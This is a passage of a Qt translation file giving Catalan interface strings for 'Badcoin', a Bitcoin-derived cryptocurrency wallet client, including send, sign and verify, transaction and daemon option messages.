<translation>Error codificant la URI en un codi QR.</translation> </message> <message> <location line="+40"/> <source>The entered amount is invalid, please check.</source> <translation>La quantitat introduïda és invalida, si us plau comprovi-la.</translation> </message> <message> <location line="+23"/> <source>Resulting URI too long, try to reduce the text for label / message.</source> <translation>URI resultant massa llarga, intenta reduir el text per a la etiqueta / missatge</translation> </message> <message> <location line="+25"/> <source>Save QR Code</source> 
<translation>Desar codi QR</translation> </message> <message> <location line="+0"/> <source>PNG Images (*.png)</source> <translation>Imatges PNG (*.png)</translation> </message> </context> <context> <name>RPCConsole</name> <message> <location filename="../forms/rpcconsole.ui" line="+46"/> <source>Client name</source> <translation>Nom del client</translation> </message> <message> <location line="+10"/> <location line="+23"/> <location line="+26"/> <location line="+23"/> <location line="+23"/> <location line="+36"/> <location line="+53"/> <location line="+23"/> <location line="+23"/> <location filename="../rpcconsole.cpp" line="+339"/> <source>N/A</source> <translation>N/A</translation> </message> <message> <location line="-217"/> <source>Client version</source> <translation>Versió del client</translation> </message> <message> <location line="-45"/> <source>&amp;Information</source> <translation>&amp;Informació</translation> </message> <message> <location line="+68"/> <source>Using OpenSSL version</source> <translation>Utilitzant OpenSSL versió</translation> </message> <message> <location line="+49"/> <source>Startup time</source> <translation>Temps d&apos;inici</translation> </message> <message> <location line="+29"/> <source>Network</source> <translation>Xarxa</translation> </message> <message> <location line="+7"/> <source>Number of connections</source> <translation>Nombre de connexions</translation> </message> <message> <location line="+23"/> <source>On testnet</source> <translation>A testnet</translation> </message> <message> <location line="+23"/> <source>Block chain</source> <translation>Cadena de blocs</translation> </message> <message> <location line="+7"/> <source>Current number of blocks</source> <translation>Nombre actual de blocs</translation> </message> <message> <location line="+23"/> <source>Estimated total blocks</source> <translation>Total estimat de blocs</translation> </message> <message> <location line="+23"/> <source>Last block time</source> <translation>Hora de l&apos;últim bloc</translation> </message> <message> <location line="+52"/> <source>&amp;Open</source> <translation>&amp;Obrir</translation> </message> <message> <location line="+16"/> <source>Command-line options</source> <translation>Opcions de línia d&apos;ordres</translation> </message> <message> <location line="+7"/> <source>Show the BadCoind-Qt help message to get a list with possible Bitcoin command-line options.</source> <translation>Mostrar el missatge d&apos;ajuda de Badcoin-Qt per a obtenir un llistat de possibles ordres per a la línia d&apos;ordres de Badcoin.</translation> </message> <message> <location line="+3"/> <source>&amp;Show</source> <translation>&amp;Mostrar</translation> </message> <message> <location line="+24"/> <source>&amp;Console</source> <translation>&amp;Consola</translation> </message> <message> <location line="-260"/> <source>Build date</source> <translation>Data de compilació</translation> </message> <message> <location line="-104"/> <source>Bitcoin - Debug window</source> <translation>Badcoin - Finestra de debug</translation> </message> <message> <location line="+25"/> <source>Bitcoin Core</source> <translation>Nucli de Badcoin</translation> </message> <message> <location line="+279"/> <source>Debug log file</source> <translation>Dietari de debug</translation> </message> <message> <location line="+7"/> <source>Open the Bitcoin debug log file from the current data directory.
This can take a few seconds for large log files.</source> <translation>Obrir el dietari de debug de Badcoin del directori de dades actual. Això pot trigar uns quants segons per a dietaris grossos.</translation> </message> <message> <location line="+102"/> <source>Clear console</source> <translation>Netejar consola</translation> </message> <message> <location filename="../rpcconsole.cpp" line="-30"/> <source>Welcome to the Bitcoin RPC console.</source> <translation>Benvingut a la consola RPC de Badcoin.</translation> </message> <message> <location line="+1"/> <source>Use up and down arrows to navigate history, and &lt;b&gt;Ctrl-L&lt;/b&gt; to clear screen.</source> <translation>Utilitza les fletxes d&apos;amunt i avall per navegar per l&apos;històric, i &lt;b&gt;Ctrl-L&lt;/b&gt; per netejar la pantalla.</translation> </message> <message> <location line="+1"/> <source>Type &lt;b&gt;help&lt;/b&gt; for an overview of available commands.</source> <translation>Escriu &lt;b&gt;help&lt;/b&gt; per a obtenir un llistat de les ordres disponibles.</translation> </message> </context> <context> <name>SendCoinsDialog</name> <message> <location filename="../forms/sendcoinsdialog.ui" line="+14"/> <location filename="../sendcoinsdialog.cpp" line="+124"/> <location line="+5"/> <location line="+5"/> <location line="+5"/> <location line="+6"/> <location line="+5"/> <location line="+5"/> <source>Send Coins</source> <translation>Enviar monedes</translation> </message> <message> <location line="+50"/> <source>Send to multiple recipients at once</source> <translation>Enviar a múltiples destinataris al mateix temps</translation> </message> <message> <location line="+3"/> <source>Add &amp;Recipient</source> <translation>Afegir &amp;Destinatari</translation> </message> <message> <location line="+20"/> <source>Remove all transaction fields</source> <translation>Netejar tots els camps de la transacció</translation> </message> <message> <location line="+3"/> <source>Clear &amp;All</source> <translation>Esborrar &amp;Tot</translation> </message> <message> <location line="+22"/> <source>Balance:</source> <translation>Balanç:</translation> </message> <message> <location line="+10"/> <source>123.456 BAD</source> <translation>123.456 BAD</translation> </message> <message> <location line="+31"/> <source>Confirm the send action</source> <translation>Confirmi l&apos;acció d&apos;enviament</translation> </message> <message> <location line="+3"/> <source>S&amp;end</source> <translation>E&amp;nviar</translation> </message> <message> <location filename="../sendcoinsdialog.cpp" line="-59"/> <source>&lt;b&gt;%1&lt;/b&gt; to %2 (%3)</source> <translation>&lt;b&gt;%1&lt;/b&gt; a %2 (%3)</translation> </message> <message> <location line="+5"/> <source>Confirm send coins</source> <translation>Confirmar l&apos;enviament de monedes</translation> </message> <message> <location line="+1"/> <source>Are you sure you want to send %1?</source> <translation>Estàs segur que vols enviar %1?</translation> </message> <message> <location line="+0"/> <source> and </source> <translation> i </translation> </message> <message> <location line="+23"/> <source>The recipient address is not valid, please recheck.</source> <translation>L&apos;adreça del destinatari no és vàlida, si us plau comprovi-la.</translation> </message> <message> <location line="+5"/> <source>The amount to pay must be larger than 0.</source> <translation>La quantitat a pagar ha de ser major que 0.</translation> </message> <message> <location line="+5"/> <source>The amount exceeds your
balance.</source> <translation>L&apos;import supera el saldo del seu compte.</translation> </message> <message> <location line="+5"/> <source>The total exceeds your balance when the %1 transaction fee is included.</source> <translation>El total excedeix el teu balanç quan s&apos;afegeix la comissió de transacció %1.</translation> </message> <message> <location line="+6"/> <source>Duplicate address found, can only send to each address once per send operation.</source> <translation>S&apos;ha trobat una adreça duplicada, tan sols es pot enviar a cada adreça un cop per ordre d&apos;enviament.</translation> </message> <message> <location line="+5"/> <source>Error: Transaction creation failed!</source> <translation>Error: La creació de la transacció ha fallat!</translation> </message> <message> <location line="+5"/> <source>Error: The transaction was rejected. This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source> <translation>Error: La transacció ha estat rebutjada. Això pot passar si alguna de les monedes del teu moneder ja s&apos;han gastat, com si haguessis usat una còpia de l&apos;arxiu wallet.dat i s&apos;haguessin gastat monedes de la còpia però sense marcar com gastades en aquest.</translation> </message> </context> <context> <name>SendCoinsEntry</name> <message> <location filename="../forms/sendcoinsentry.ui" line="+14"/> <source>Form</source> <translation>Formulari</translation> </message> <message> <location line="+15"/> <source>A&amp;mount:</source> <translation>Q&amp;uantitat:</translation> </message> <message> <location line="+13"/> <source>Pay &amp;To:</source> <translation>Pagar &amp;A:</translation> </message> <message> <location line="+34"/> <source>The address to send the payment to (e.g. 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</source> <translation>L&apos;adreça on enviar el pagament (per exemple: 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</translation> </message> <message> <location line="+60"/> <location filename="../sendcoinsentry.cpp" line="+26"/> <source>Enter a label for this address to add it to your address book</source> <translation>Introdueixi una etiqueta per a aquesta adreça per afegir-la a la llibreta d&apos;adreces</translation> </message> <message> <location line="-78"/> <source>&amp;Label:</source> <translation>&amp;Etiqueta:</translation> </message> <message> <location line="+28"/> <source>Choose address from address book</source> <translation>Escollir adreça de la llibreta d&apos;adreces</translation> </message> <message> <location line="+10"/> <source>Alt+A</source> <translation>Alt+A</translation> </message> <message> <location line="+7"/> <source>Paste address from clipboard</source> <translation>Enganxar adreça del porta-retalls</translation> </message> <message> <location line="+10"/> <source>Alt+P</source> <translation>Alt+P</translation> </message> <message> <location line="+7"/> <source>Remove this recipient</source> <translation>Eliminar aquest destinatari</translation> </message> <message> <location filename="../sendcoinsentry.cpp" line="+1"/> <source>Enter a Bitcoin address (e.g.
1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</source> <translation>Introdueixi una adreça de Badcoin (per exemple 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</translation> </message> </context> <context> <name>SignVerifyMessageDialog</name> <message> <location filename="../forms/signverifymessagedialog.ui" line="+14"/> <source>Signatures - Sign / Verify a Message</source> <translation>Signatures - Signar / Verificar un Missatge</translation> </message> <message> <location line="+13"/> <source>&amp;Sign Message</source> <translation>&amp;Signar Missatge</translation> </message> <message> <location line="+6"/> <source>You can sign messages with your addresses to prove you own them. Be careful not to sign anything vague, as phishing attacks may try to trick you into signing your identity over to them. Only sign fully-detailed statements you agree to.</source> <translation>Pots signar missatges amb la teva adreça per provar que són teus. Vés amb compte de no signar res vague, ja que els atacs de phishing poden intentar enganyar-te perquè els hi signis la teva identitat. Tan sols signa declaracions completament detallades amb les que hi estàs d&apos;acord.</translation> </message> <message> <location line="+18"/> <source>The address to sign the message with (e.g. 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</source> <translation>L&apos;adreça amb la que signar els missatges (per exemple 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</translation> </message> <message> <location line="+10"/> <location line="+213"/> <source>Choose an address from the address book</source> <translation>Escollir una adreça de la llibreta d&apos;adreces</translation> </message> <message> <location line="-203"/> <location line="+213"/> <source>Alt+A</source> <translation>Alt+A</translation> </message> <message> <location line="-203"/> <source>Paste address from clipboard</source> <translation>Enganxar adreça del porta-retalls</translation> </message> <message> <location line="+10"/> <source>Alt+P</source> <translation>Alt+P</translation> </message> <message> <location line="+12"/> <source>Enter the message you want to sign here</source> <translation>Introdueix aquí el missatge que vols signar</translation> </message> <message> <location line="+7"/> <source>Signature</source> <translation>Signatura</translation> </message> <message> <location line="+27"/> <source>Copy the current signature to the system clipboard</source> <translation>Copiar la signatura actual al porta-retalls del sistema</translation> </message> <message> <location line="+21"/> <source>Sign the message to prove you own this Bitcoin address</source> <translation>Signa el missatge per provar que ets propietari d&apos;aquesta adreça Badcoin</translation> </message> <message> <location line="+3"/> <source>Sign &amp;Message</source> <translation>Signar &amp;Missatge</translation> </message> <message> <location line="+14"/> <source>Reset all sign message fields</source> <translation>Neteja tots els camps de signatura de missatge</translation> </message> <message> <location line="+3"/> <location line="+146"/> <source>Clear &amp;All</source> <translation>Esborrar &amp;Tot</translation> </message> <message> <location line="-87"/> <source>&amp;Verify Message</source> <translation>&amp;Verificar el missatge</translation> </message> <message> <location line="+6"/> <source>Enter the signing address, message (ensure you copy line breaks, spaces, tabs, etc. exactly) and signature below to verify the message.
Be careful not to read more into the signature than what is in the signed message itself, to avoid being tricked by a man-in-the-middle attack.</source> <translation>Introdueixi l&apos;adreça signant, missatge (assegura&apos;t que copies salts de línia, espais, tabuladors, etc. exactament tot el text) i la signatura a sota per verificar el missatge. Per evitar ser enganyat per un atac home-entre-mig, vés amb compte de no llegir més en la signatura del que hi ha al missatge signat mateix.</translation> </message> <message> <location line="+21"/> <source>The address the message was signed with (e.g. 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</source> <translation>L&apos;adreça amb la que el missatge va ser signat (per exemple 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</translation> </message> <message> <location line="+40"/> <source>Verify the message to ensure it was signed with the specified Bitcoin address</source> <translation>Verificar el missatge per assegurar-se que ha estat signat amb l&apos;adreça Badcoin especificada</translation> </message> <message> <location line="+3"/> <source>Verify &amp;Message</source> <translation>Verificar &amp;Missatge</translation> </message> <message> <location line="+14"/> <source>Reset all verify message fields</source> <translation>Neteja tots els camps de verificació de missatge</translation> </message> <message> <location filename="../signverifymessagedialog.cpp" line="+27"/> <location line="+3"/> <source>Enter a Bitcoin address (e.g. 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</source> <translation>Introdueixi una adreça de Badcoin (per exemple 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</translation> </message> <message> <location line="-2"/> <source>Click &quot;Sign Message&quot; to generate signature</source> <translation>Clica &quot;Signar Missatge&quot; per a generar una signatura</translation> </message> <message> <location line="+3"/> <source>Enter Bitcoin signature</source> <translation>Introduir una signatura Badcoin</translation> </message> <message> <location line="+82"/> <location line="+81"/> <source>The entered address is invalid.</source> <translation>L&apos;adreça introduïda és invàlida.</translation> </message> <message> <location line="-81"/> <location line="+8"/> <location line="+73"/> <location line="+8"/> <source>Please check the address and try again.</source> <translation>Si us plau, comprovi l&apos;adreça i provi de nou.</translation> </message> <message> <location line="-81"/> <location line="+81"/> <source>The entered address does not refer to a key.</source> <translation>L&apos;adreça introduïda no referencia a cap clau.</translation> </message> <message> <location line="-73"/> <source>Wallet unlock was cancelled.</source> <translation>El desbloqueig del moneder ha estat cancel·lat.</translation> </message> <message> <location line="+8"/> <source>Private key for the entered address is not available.</source> <translation>La clau privada per a l&apos;adreça introduïda no està disponible.</translation> </message> <message> <location line="+12"/> <source>Message signing failed.</source> <translation>El signat del missatge ha fallat.</translation> </message> <message> <location line="+5"/> <source>Message signed.</source> <translation>Missatge signat.</translation> </message> <message> <location line="+59"/> <source>The signature could not be decoded.</source> <translation>La signatura no s&apos;ha pogut decodificar.</translation> </message> <message> <location line="+0"/> <location line="+13"/> <source>Please check the signature and try again.</source> <translation>Si us
plau, comprovi la signatura i provi de nou.</translation> </message> <message> <location line="+0"/> <source>The signature did not match the message digest.</source> <translation>La signatura no coincideix amb el resum del missatge.</translation> </message> <message> <location line="+7"/> <source>Message verification failed.</source> <translation>Ha fallat la verificació del missatge.</translation> </message> <message> <location line="+5"/> <source>Message verified.</source> <translation>Missatge verificat.</translation> </message> </context> <context> <name>SplashScreen</name> <message> <location filename="../splashscreen.cpp" line="+22"/> <source>The Bitcoin developers</source> <translation type="unfinished"/> </message> <message> <location line="+1"/> <source>[testnet]</source> <translation type="unfinished"/> </message> </context> <context> <name>TransactionDesc</name> <message> <location filename="../transactiondesc.cpp" line="+20"/> <source>Open until %1</source> <translation>Obert fins %1</translation> </message> <message> <location line="+6"/> <source>%1/offline</source> <translation>%1/offline</translation> </message> <message> <location line="+2"/> <source>%1/unconfirmed</source> <translation>%1/sense confirmar</translation> </message> <message> <location line="+2"/> <source>%1 confirmations</source> <translation>%1 confirmacions</translation> </message> <message> <location line="+18"/> <source>Status</source> <translation>Estat</translation> </message> <message numerus="yes"> <location line="+7"/> <source>, broadcast through %n node(s)</source> <translation><numerusform>, difusió a través de %n node</numerusform><numerusform>, difusió a través de %n nodes</numerusform></translation> </message> <message> <location line="+4"/> <source>Date</source> <translation>Data</translation> </message> <message> <location line="+7"/> <source>Source</source> <translation>Font</translation> </message> <message> <location line="+0"/> <source>Generated</source> <translation>Generat</translation> </message> <message> <location line="+5"/> <location line="+17"/> <source>From</source> <translation>Des de</translation> </message> <message> <location line="+1"/> <location line="+22"/> <location line="+58"/> <source>To</source> <translation>A</translation> </message> <message> <location line="-77"/> <location line="+2"/> <source>own address</source> <translation>adreça pròpia</translation> </message> <message> <location line="-2"/> <source>label</source> <translation>etiqueta</translation> </message> <message> <location line="+37"/> <location line="+12"/> <location line="+45"/> <location line="+17"/> <location line="+30"/> <source>Credit</source> <translation>Crèdit</translation> </message> <message numerus="yes"> <location line="-102"/> <source>matures in %n more block(s)</source> <translation><numerusform>disponible en %n bloc més</numerusform><numerusform>disponibles en %n blocs més</numerusform></translation> </message> <message> <location line="+2"/> <source>not accepted</source> <translation>no acceptat</translation> </message> <message> <location line="+44"/> <location line="+8"/> <location line="+15"/> <location line="+30"/> <source>Debit</source> <translation>Dèbit</translation> </message> <message> <location line="-39"/> <source>Transaction fee</source> <translation>Comissió de transacció</translation> </message> <message> <location line="+16"/> <source>Net amount</source> <translation>Quantitat neta</translation> </message> <message> <location line="+6"/> <source>Message</source>
<translation>Missatge</translation> </message> <message> <location line="+2"/> <source>Comment</source> <translation>Comentari</translation> </message> <message> <location line="+2"/> <source>Transaction ID</source> <translation>ID de transacció</translation> </message> <message> <location line="+3"/> <source>Generated coins must mature 120 blocks before they can be spent. When you generated this block, it was broadcast to the network to be added to the block chain. If it fails to get into the chain, its state will change to &quot;not accepted&quot; and it won&apos;t be spendable. This may occasionally happen if another node generates a block within a few seconds of yours.</source> <translation>Les monedes generades han de madurar 120 blocs abans de poder ser gastades. Quan has generat aquest bloc, aquest ha estat transmès a la xarxa per a ser afegit a la cadena de blocs. Si no arriba a ser acceptat a la cadena, el seu estat passarà a &quot;no acceptat&quot; i no podrà ser gastat. Això pot ocórrer ocasionalment si un altre node genera un bloc a pocs segons del teu.</translation> </message> <message> <location line="+7"/> <source>Debug information</source> <translation>Informació de debug</translation> </message> <message> <location line="+8"/> <source>Transaction</source> <translation>Transacció</translation> </message> <message> <location line="+3"/> <source>Inputs</source> <translation>Entrades</translation> </message> <message> <location line="+23"/> <source>Amount</source> <translation>Quantitat</translation> </message> <message> <location line="+1"/> <source>true</source> <translation>cert</translation> </message> <message> <location line="+0"/> <source>false</source> <translation>fals</translation> </message> <message> <location line="-209"/> <source>, has not been successfully broadcast yet</source> <translation>, encara no ha estat emès correctament</translation> </message> <message numerus="yes"> <location line="-35"/> <source>Open for %n more block(s)</source> <translation><numerusform>Obert durant %n bloc més</numerusform><numerusform>Obert durant %n blocs més</numerusform></translation> </message> <message> <location line="+70"/> <source>unknown</source> <translation>desconegut</translation> </message> </context> <context> <name>TransactionDescDialog</name> <message> <location filename="../forms/transactiondescdialog.ui" line="+14"/> <source>Transaction details</source> <translation>Detalls de la transacció</translation> </message> <message> <location line="+6"/> <source>This pane shows a detailed description of the transaction</source> <translation>Aquest panell mostra una descripció detallada de la transacció</translation> </message> </context> <context> <name>TransactionTableModel</name> <message> <location filename="../transactiontablemodel.cpp" line="+225"/> <source>Date</source> <translation>Data</translation> </message> <message> <location line="+0"/> <source>Type</source> <translation>Tipus</translation> </message> <message> <location line="+0"/> <source>Address</source> <translation>Adreça</translation> </message> <message> <location line="+0"/> <source>Amount</source> <translation>Quantitat</translation> </message> <message numerus="yes"> <location line="+57"/> <source>Open for %n more block(s)</source> <translation><numerusform>Obert durant %n bloc més</numerusform><numerusform>Obert durant %n blocs més</numerusform></translation> </message> <message> <location line="+3"/> <source>Open until %1</source> <translation>Obert fins %1</translation> </message> <message> <location
line="+3"/> <source>Offline (%1 confirmations)</source> <translation>Sense connexió (%1 confirmacions)</translation> </message> <message> <location line="+3"/> <source>Unconfirmed (%1 of %2 confirmations)</source> <translation>Sense confirmar (%1 de %2 confirmacions)</translation> </message> <message> <location line="+3"/> <source>Confirmed (%1 confirmations)</source> <translation>Confirmat (%1 confirmacions)</translation> </message> <message numerus="yes"> <location line="+8"/> <source>Mined balance will be available when it matures in %n more block(s)</source> <translation><numerusform>El saldo recent minat estarà disponible quan venci el termini en %n bloc més</numerusform><numerusform>El saldo recent minat estarà disponible quan venci el termini en %n blocs més</numerusform></translation> </message> <message> <location line="+5"/> <source>This block was not received by any other nodes and will probably not be accepted!</source> <translation>Aquest bloc no ha estat rebut per cap altre node i probablement no serà acceptat!</translation> </message> <message> <location line="+3"/> <source>Generated but not accepted</source> <translation>Generat però no acceptat</translation> </message> <message> <location line="+43"/> <source>Received with</source> <translation>Rebut amb</translation> </message> <message> <location line="+2"/> <source>Received from</source> <translation>Rebut de</translation> </message> <message> <location line="+3"/> <source>Sent to</source> <translation>Enviat a</translation> </message> <message> <location line="+2"/> <source>Payment to yourself</source> <translation>Pagament a un mateix</translation><|fim▁hole|> <message> <location line="+2"/> <source>Mined</source> <translation>Minat</translation> </message> <message> <location line="+38"/> <source>(n/a)</source> <translation>(n/a)</translation> </message> <message> <location line="+199"/> <source>Transaction status. Hover over this field to show number of confirmations.</source> <translation>Estat de la transacció. 
Passa el cursor per sobre d&apos;aquest camp per mostrar el nombre de confirmacions.</translation> </message> <message> <location line="+2"/> <source>Date and time that the transaction was received.</source> <translation>Data i hora en què la transacció va ser rebuda.</translation> </message> <message> <location line="+2"/> <source>Type of transaction.</source> <translation>Tipus de transacció.</translation> </message> <message> <location line="+2"/> <source>Destination address of transaction.</source> <translation>Adreça del destinatari de la transacció.</translation> </message> <message> <location line="+2"/> <source>Amount removed from or added to balance.</source> <translation>Quantitat extreta o afegida del balanç.</translation> </message> </context> <context> <name>TransactionView</name> <message> <location filename="../transactionview.cpp" line="+52"/> <location line="+16"/> <source>All</source> <translation>Tot</translation> </message> <message> <location line="-15"/> <source>Today</source> <translation>Avui</translation> </message> <message> <location line="+1"/> <source>This week</source> <translation>Aquesta setmana</translation> </message> <message> <location line="+1"/> <source>This month</source> <translation>Aquest mes</translation> </message> <message> <location line="+1"/> <source>Last month</source> <translation>El mes passat</translation> </message> <message> <location line="+1"/> <source>This year</source> <translation>Enguany</translation> </message> <message> <location line="+1"/> <source>Range...</source> <translation>Rang...</translation> </message> <message> <location line="+11"/> <source>Received with</source> <translation>Rebut amb</translation> </message> <message> <location line="+2"/> <source>Sent to</source> <translation>Enviat a</translation> </message> <message> <location line="+2"/> <source>To yourself</source> <translation>A tu mateix</translation> </message> <message> <location line="+1"/> <source>Mined</source> <translation>Minat</translation> </message> <message> <location line="+1"/> <source>Other</source> <translation>Altres</translation> </message> <message> <location line="+7"/> <source>Enter address or label to search</source> <translation>Introdueix una adreça o una etiqueta per cercar</translation> </message> <message> <location line="+7"/> <source>Min amount</source> <translation>Quantitat mínima</translation> </message> <message> <location line="+34"/> <source>Copy address</source> <translation>Copiar adreça</translation> </message> <message> <location line="+1"/> <source>Copy label</source> <translation>Copiar etiqueta</translation> </message> <message> <location line="+1"/> <source>Copy amount</source> <translation>Copiar quantitat</translation> </message> <message> <location line="+1"/> <source>Copy transaction ID</source> <translation>Copiar ID de transacció</translation> </message> <message> <location line="+1"/> <source>Edit label</source> <translation>Editar etiqueta</translation> </message> <message> <location line="+1"/> <source>Show transaction details</source> <translation>Mostra detalls de la transacció</translation> </message> <message> <location line="+139"/> <source>Export Transaction Data</source> <translation>Exportar dades de la transacció</translation> </message> <message> <location line="+1"/> <source>Comma separated file (*.csv)</source> <translation>Arxiu separat per comes (*.csv)</translation> </message> <message> <location line="+8"/> <source>Confirmed</source> <translation>Confirmat</translation> </message> <message>
<location line="+1"/> <source>Date</source> <translation>Data</translation> </message> <message> <location line="+1"/> <source>Type</source> <translation>Tipus</translation> </message> <message> <location line="+1"/> <source>Label</source> <translation>Etiqueta</translation> </message> <message> <location line="+1"/> <source>Address</source> <translation>Direcció</translation> </message> <message> <location line="+1"/> <source>Amount</source> <translation>Quantitat</translation> </message> <message> <location line="+1"/> <source>ID</source> <translation>ID</translation> </message> <message> <location line="+4"/> <source>Error exporting</source> <translation>Error en l&apos;exportació</translation> </message> <message> <location line="+0"/> <source>Could not write to file %1.</source> <translation>No s&apos;ha pogut escriure a l&apos;arxiu %1.</translation> </message> <message> <location line="+100"/> <source>Range:</source> <translation>Rang:</translation> </message> <message> <location line="+8"/> <source>to</source> <translation>a</translation> </message> </context> <context> <name>WalletModel</name> <message> <location filename="../walletmodel.cpp" line="+193"/> <source>Send Coins</source> <translation>Enviar monedes</translation> </message> </context> <context> <name>WalletView</name> <message> <location filename="../walletview.cpp" line="+42"/> <source>&amp;Export</source> <translation type="unfinished"/> </message> <message> <location line="+1"/> <source>Export the data in the current tab to a file</source> <translation type="unfinished"/> </message> <message> <location line="+193"/> <source>Backup Wallet</source> <translation>Realitzar còpia de seguretat del moneder</translation> </message> <message> <location line="+0"/> <source>Wallet Data (*.dat)</source> <translation>Dades del moneder (*.dat)</translation> </message> <message> <location line="+3"/> <source>Backup Failed</source> <translation>Còpia de seguretat faillida</translation> </message> <message> <location line="+0"/> <source>There was an error trying to save the wallet data to the new location.</source> <translation>Hi ha hagut un error intentant desar les dades del moneder al nou directori</translation> </message> <message> <location line="+4"/> <source>Backup Successful</source> <translation>Copia de seguretat realitzada correctament</translation> </message> <message> <location line="+0"/> <source>The wallet data was successfully saved to the new location.</source> <translation>Les dades del moneder han estat desades cirrectament al nou emplaçament.</translation> </message> </context> <context> <name>bitcoin-core</name> <message> <location filename="../bitcoinstrings.cpp" line="+94"/> <source>Bitcoin version</source> <translation>Versió de Badcoin</translation> </message> <message> <location line="+102"/> <source>Usage:</source> <translation>Ús:</translation> </message> <message> <location line="-29"/> <source>Send command to -server or BadCoind</source> <translation>Enviar comanda a -servidor o badcoind</translation> </message> <message> <location line="-23"/> <source>List commands</source> <translation>Llista d&apos;ordres</translation> </message> <message> <location line="-12"/> <source>Get help for a command</source> <translation>Obtenir ajuda per a un ordre.</translation> </message> <message> <location line="+24"/> <source>Options:</source> <translation>Opcions:</translation> </message> <message> <location line="+24"/> <source>Specify configuration file (default: bitcoin.conf)</source> <translation>Especificat 
arxiu de configuració (per defecte: badcoin.conf)</translation> </message> <message> <location line="+3"/> <source>Specify pid file (default: BadCoind.pid)</source> <translation>Especificar arxiu pid (per defecte: badcoind.pid)</translation> </message> <message> <location line="-1"/> <source>Specify data directory</source> <translation>Especificar directori de dades</translation> </message> <message> <location line="-9"/> <source>Set database cache size in megabytes (default: 25)</source> <translation>Establir la mida de la memòria cau de la base de dades en megabytes (per defecte: 25)</translation> </message> <message> <location line="-28"/> <source>Listen for connections on &lt;port&gt; (default: 11061 or testnet: 5744)</source> <translation>Escoltar connexions a &lt;port&gt; (per defecte: 11061 o testnet: 5744)</translation> </message> <message> <location line="+5"/> <source>Maintain at most &lt;n&gt; connections to peers (default: 125)</source> <translation>Mantenir com a molt &lt;n&gt; connexions a peers (per defecte: 125)</translation> </message> <message> <location line="-48"/> <source>Connect to a node to retrieve peer addresses, and disconnect</source> <translation>Connectar a un node per obtenir les adreces de les connexions, i desconnectar</translation> </message> <message> <location line="+82"/> <source>Specify your own public address</source> <translation>Especificar la teva adreça pública</translation> </message> <message> <location line="+3"/> <source>Threshold for disconnecting misbehaving peers (default: 100)</source> <translation>Límit per a desconnectar connexions errònies (per defecte: 100)</translation> </message> <message> <location line="-134"/> <source>Number of seconds to keep misbehaving peers from reconnecting (default: 86400)</source> <translation>Nombre de segons durant els quals s&apos;impedeix la reconnexió de les connexions errònies (per defecte: 86400)</translation> </message> <message> <location line="-29"/> <source>An error occurred while setting up the RPC port %u for listening on IPv4: %s</source> <translation>Ha sorgit un error al configurar el port RPC %u escoltant a IPv4: %s</translation> </message> <message> <location line="+27"/> <source>Listen for JSON-RPC connections on &lt;port&gt; (default: 21061 or testnet: 5745)</source> <translation>Escoltar connexions JSON-RPC al port &lt;port&gt; (per defecte: 21061 o testnet: 5745)</translation> </message> <message> <location line="+37"/> <source>Accept command line and JSON-RPC commands</source> <translation>Acceptar línia d&apos;ordres i ordres JSON-RPC</translation> </message> <message> <location line="+76"/> <source>Run in the background as a daemon and accept commands</source> <translation>Executar en segon pla com a programa dimoni i acceptar ordres</translation> </message> <message> <location line="+37"/> <source>Use the test network</source> <translation>Usar la xarxa de prova</translation> </message> <message> <location line="-112"/> <source>Accept connections from outside (default: 1 if no -proxy or -connect)</source> <translation>Acceptar connexions de fora (per defecte: 1 si no hi ha -proxy o -connect)</translation> </message> <message> <location line="-80"/> <source>%s, you must set a rpcpassword in the configuration file: %s It is recommended you use the following random password: rpcuser=bitcoinrpc rpcpassword=%s (you do not need to remember this password) The username and password MUST NOT be the same. If the file does not exist, create it with owner-readable-only file permissions.
It is also recommended to set alertnotify so you are notified of problems; for example: alertnotify=echo %%s | mail -s &quot;Bitcoin Alert&quot; [email protected] </source> <translation>%s, has d&apos;establir una contrasenya RPC a l&apos;arxiu de configuració:
%s
Es recomana que useu la següent contrasenya aleatòria:
rpcuser=badcoinrpc
rpcpassword=%s
(no necessiteu recordar aquesta contrasenya)
El nom d&apos;usuari i la contrasenya NO HAN de ser els mateixos.
Si l&apos;arxiu no existeix, crea&apos;l amb els permisos d&apos;arxiu de només lectura per al propietari.
També es recomana establir alertnotify i així seràs notificat de les incidències;
per exemple: alertnotify=echo %%s | mail -s &quot;Badcoin Alert&quot; [email protected]</translation> </message> <message> <location line="+17"/> <source>An error occurred while setting up the RPC port %u for listening on IPv6, falling back to IPv4: %s</source> <translation>Ha sorgit un error al configurar el port RPC %u escoltant a IPv6, retrocedint a IPv4: %s</translation> </message> <message> <location line="+3"/> <source>Bind to given address and always listen on it. Use [host]:port notation for IPv6</source> <translation>Vincular a una adreça específica i sempre escoltar-hi. Utilitza la notació [host]:port per IPv6</translation> </message> <message> <location line="+3"/> <source>Cannot obtain a lock on data directory %s. Bitcoin is probably already running.</source> <translation>No es pot bloquejar el directori de dades %s. Probablement Badcoin ja estigui en execució.</translation> </message> <message> <location line="+3"/> <source>Error: The transaction was rejected! This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source> <translation>Error: La transacció ha estat rebutjada!
